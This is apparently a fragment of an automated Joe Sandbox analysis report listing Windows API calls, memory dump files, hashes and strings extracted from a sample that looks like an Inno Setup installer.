                                                                              • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveLong$Message
                                                                              • String ID:
                                                                              • API String ID: 2785966331-0
                                                                              • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                              • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                              • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                              • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000), ref: 0042949A
                                                                              • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                              • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                              • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                              • String ID:
                                                                              • API String ID: 361401722-0
                                                                              • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                              • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                              • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                              • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                              • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                              • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                              • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectStock$A24620A480A570IconLoad
                                                                              • String ID:
                                                                              • API String ID: 3573811560-0
                                                                              • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                              • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                              • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                              • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                              • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: $ $Internal error: Item already expanding
                                                                              • API String ID: 1675784387-1948079669
                                                                              • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                              • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                              • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                              • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                              APIs
                                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                              • 73A259E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                              • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A259ClassInfoMessageSend
                                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                                              • API String ID: 3217714596-4234151509
                                                                              • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                              • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                              • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                              • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                              • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                              • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                              • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                              • String ID: ,$?
                                                                              • API String ID: 2359071979-2308483597
                                                                              • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                              • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                              • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                              • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                              APIs
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                              • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                              • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                              • String ID:
                                                                              • API String ID: 1030595962-0
                                                                              • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                              • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                              • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                              • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                              APIs
                                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                              • 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                              • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                              • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                              • 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Stretch$A18830$A122A24620BitsMode
                                                                              • String ID:
                                                                              • API String ID: 430401518-0
                                                                              • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                              • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                              • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                              • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                              • TranslateMessage.USER32(?), ref: 004565AB
                                                                              • DispatchMessageA.USER32(?), ref: 004565B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                              • String ID: [Paused]
                                                                              • API String ID: 3047529653-4230553315
                                                                              • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                              • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                              • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                              • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                              APIs
                                                                              • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LoadSleep
                                                                              • String ID: CheckPassword
                                                                              • API String ID: 4023313301-1302249611
                                                                              • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                              • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                              • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                              • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                              APIs
                                                                                • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                              • GetTickCount.KERNEL32 ref: 0047678E
                                                                              • GetTickCount.KERNEL32 ref: 00476798
                                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                              Strings
                                                                              • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                              • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                              • API String ID: 613034392-3771334282
                                                                              • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                              • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                              • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                              • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                              Strings
                                                                              • CreateAssemblyCache, xrefs: 00458F56
                                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                              • Fusion.dll, xrefs: 00458EFF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                              • API String ID: 190572456-3990135632
                                                                              • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                              • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                              • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                              • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                              APIs
                                                                                • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                              • GetFocus.USER32 ref: 0041C178
                                                                              • 73A1A570.USER32(?), ref: 0041C184
                                                                              • 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                              • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                              • 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                              • 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A18830$A122A480A570BitsFocusObject
                                                                              • String ID:
                                                                              • API String ID: 2231653193-0
                                                                              • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                              • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                              • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                              • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                              • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                • Part of subcall function 004099C0: 6F52C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                              • 6F59CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                              • 6F59C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                              • 6F59CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
